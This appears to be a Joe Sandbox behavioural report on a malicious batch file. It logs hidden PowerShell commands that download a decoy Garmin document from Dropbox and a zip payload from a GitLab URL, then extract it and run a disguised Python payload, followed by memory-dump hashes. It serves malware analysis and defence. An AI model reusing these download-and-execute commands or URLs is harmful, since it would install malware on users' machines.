                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                        Start time:08:20:15
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:findstr /L /I pause "C:\Users\user\Desktop\fghdsdf17.bat"
                                                                                                                                                                                                                        Imagebase:0x7ff68bd80000
                                                                                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                        Start time:08:20:15
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:find
                                                                                                                                                                                                                        Imagebase:0x7ff6b52f0000
                                                                                                                                                                                                                        File size:17'920 bytes
                                                                                                                                                                                                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                        Start time:08:20:15
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                                        Imagebase:0x7ff780880000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                        Start time:08:20:16
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
                                                                                                                                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                        Start time:08:20:25
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"
                                                                                                                                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                        Start time:08:20:27
                                                                                                                                                                                                                        Start date:19/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 08:20:39
Start date: 19/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 08:20:54
Start date: 19/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000010.00000002.1813962816.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffb4b0e0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 53052386e95686169c9ab40513d85dc7571d82428435a9fff3e546adfa574488
                                                                                                                                                                                                                          • Instruction ID: d8b2895b24068e17520d54ae912a778a7032f5be6b02211a89a08db746c24f1f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53052386e95686169c9ab40513d85dc7571d82428435a9fff3e546adfa574488
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63E149A290EBC95FE356AF3899561A47FE0EF47311F0841FBD188C76A3E9195C06C392
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000010.00000002.1813962816.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffb4b0e0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a4d6453f5f644130a5e2bba10058f0ab009407009f602474eb5fc9807b517129
                                                                                                                                                                                                                          • Instruction ID: 5282ad7463c94d191b30971ed38967813c6b4f5c77f6b8fe17320f4c26ee8b25
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4d6453f5f644130a5e2bba10058f0ab009407009f602474eb5fc9807b517129
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22D135A290EA896FE797EE78C8555B57FD0FF56311B0801FED14CC72A3D918A8068351
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000010.00000002.1813388898.00007FFB4B010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B010000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffb4b010000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5952e0301d88501fe669cecb32d5d6fa1a67fb066b70c2fdf5e50c7064cd6e0e
                                                                                                                                                                                                                          • Instruction ID: e1d5514103b5f5435afac9fd7cbf8eb0b7d3a45f24fbbb258f2b77c816128e6f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5952e0301d88501fe669cecb32d5d6fa1a67fb066b70c2fdf5e50c7064cd6e0e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA018CB2B0CA080BD75CAD5CA8431BC73D1E799621B04427FE18EC23A2DE26A80346C6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000010.00000002.1813388898.00007FFB4B010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B010000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffb4b010000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: da7ac2bedb05257be2116c4359ed823bdb9a532f86bbc5f4ef1b2a8993024a30
                                                                                                                                                                                                                          • Instruction ID: 954421d6436c14bbcf979b0a81a8330e83fe11bb28a3c70cc45761f1a3f21767
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da7ac2bedb05257be2116c4359ed823bdb9a532f86bbc5f4ef1b2a8993024a30
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 470192B2B0CA080BD75CAD5CB8432BC73D1E799621F04027FE18EC33A2DE2658434686
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000010.00000002.1813388898.00007FFB4B010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B010000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffb4b010000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 63fed72249cab851f4653241823588e350d0b5d4d6b11fe8e244d57ded66706b
                                                                                                                                                                                                                          • Instruction ID: 0127310653a8b4caf04bc5cba12ef8d2be6febd9597b0190423b58240b653530
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63fed72249cab851f4653241823588e350d0b5d4d6b11fe8e244d57ded66706b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A015EB2B1CA1D1BD75CAD5CA8531B873D1E799621B04437FE18EC33A2DE26980346C6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000010.00000002.1813388898.00007FFB4B010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B010000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffb4b010000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                          • Instruction ID: 243c62b5e167e88e3156c96cdccebd04ac812e3661c47b400fc415154ea3cba3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101677111CB0C8FDB48EF0CE451AB5B7E0FB95364F10056EE58AC3661DA36E882CB46